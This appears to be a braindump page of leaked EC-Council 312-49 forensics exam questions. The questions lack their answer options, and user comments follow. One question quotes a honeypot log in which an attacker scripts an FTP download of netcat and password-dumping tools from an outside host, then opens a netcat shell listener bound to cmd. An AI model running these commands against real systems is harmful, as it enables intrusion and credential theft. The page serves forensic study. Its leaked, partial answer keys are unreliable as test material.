When investigating a potential e-mail crime, what is your first step in the investigation?
Answer(s): A
If a suspect computer is located in an area that may have toxic chemicals, you must:
The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful.(Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.)Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558From the options given below choose the one which best interprets the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
What happens when a file is deleted by a Microsoft operating system using the FAT file system?
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below."cmd1.exe /c open 213.116.251.162 >ftpcom""cmd1.exe /c echo johna2k >>ftpcom""cmd1.exe /c echo haxedj00 >>ftpcom""cmd1.exe /c echo get nc.exe >>ftpcom""cmd1.exe /c echo get pdump.exe >>ftpcom""cmd1.exe /c echo get samdump.dll >>ftpcom""cmd1.exe /c echo quit >>ftpcom""cmd1.exe /c ftp -s:ftpcom""cmd1.exe /c nc -l -p 6969 -e cmd1.exe"What can you infer from the exploit given?
Answer(s): C
The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.
Share your comments for EC-Council 312-49 exam with other users:
helpful dump questions
question 423 eigrp uses metric
hello nice dumps
good resource for learning
very useful
physical tempering techniques
its giving best technical knowledge
please upload
great question with explanation thanks!!
does this exam have lab sections?
please upload the braindump for .net
i need this exam 1z0-1107-2. please.
very useful!
for this question - "which three type of basic patient or member information is displayed on the patient info component? (choose three.)", list of conditions is not displayed (it is displayed in patient card, not patient info). so should be thumbnail of chatter photo
q52 should be d. vm storage controller bandwidth represents the amount of data (in terms of bandwidth) that a vms storage controller is using to read and write data to the storage fabric.
nice questions
question # 208: failure logs is not an example of operational metadata.
good questions
thank you for the test materials!
its very helpful
good questons
i need the dumb of the hcip security v4.0 exam
upload the dump please
yes, iam looking this
please upload cima e2 managing performance dumps
wonderful questions
i used this site since 2000, still great to support my career
why is the answer to "which of the following is required by scrum?" all of the following stated below since most of them are not mandatory? sprint retrospective. members must be stand up at the daily scrum. sprint burndown chart. release planning.
great job. hope this helps out.
upload please. many thanks!
this is so interesting